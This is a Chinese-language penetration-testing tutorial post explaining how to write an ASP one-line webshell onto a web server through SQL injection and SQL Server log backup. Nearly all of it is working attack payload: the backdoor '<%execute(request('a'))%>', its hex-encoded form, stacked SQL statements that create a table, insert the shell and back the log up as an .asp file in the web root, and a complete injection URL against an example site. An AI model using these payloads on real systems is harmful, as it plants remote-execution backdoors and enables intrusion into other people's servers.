[原创]WEB安全第四章SQL注入篇14sqlserver备份拿WEBSHELL
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第四章SQL注入篇14sqlserver备份拿WEBSHELL
<%execute(request(“a”))%>
差异备份 经常会出错的 不稳定 所以建议用log备份一句话
log备份一句话
确认是否存在test_tmp表 这个一般是被人检测过 才用的 ,正常情况下不需要删除。
;IF EXISTS(select table_name from information_schema.tables where table_name=’test_tmp’)drop table test_tmp;alter database mydb set RECOVERY FULL;
; drop table test_tmp;create table test_tmp (a image);backup log mydb to disk =’C:/inetpub/wwwroot/www.demo1.com/asp.bak’ with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk = ‘C:/inetpub/wwwroot/www.demo1.com/123.asp’
删除表
;drop table test_tmp
创建test_tmp表
;create table test_tmp (a image);
将mydb库完整备份到指定目录
;backup log mydb to disk =’C:/inetpub/wwwroot/www.demo1.com/asp.bak’ with init;
写入一句话
;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA)
;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA)
;backup log mydb to disk = ‘C:/inetpub/wwwroot/www.demo1.com/123.asp’
;drop table test_tmp
注入点输入以下语句即可
http://www.demo1.com/index.aspx?id=1;IF EXISTS(select table_name from information_schema.tables where table_name=’test_tmp’)drop table test_tmp;create table test_tmp (a image);backup log mydb to disk =’C:/inetpub/wwwroot/www.demo1.com/asp.bak’ with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk = ‘C:/inetpub/wwwroot/www.demo1.com/123.asp’
select * from art where id=1;IF EXISTS(select table_name from information_schema.tables where table_name=’test_tmp’)drop table test_tmp;create table test_tmp (a image);backup log mydb to disk =’C:/inetpub/wwwroot/www.demo1.com/asp.bak’ with init;insert into test_tmp (a) values (0x3C25657865637574652872657175657374282261222929253EDA);backup log mydb to disk = ‘C:/inetpub/wwwroot/www.demo1.com/123.asp’
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/131.html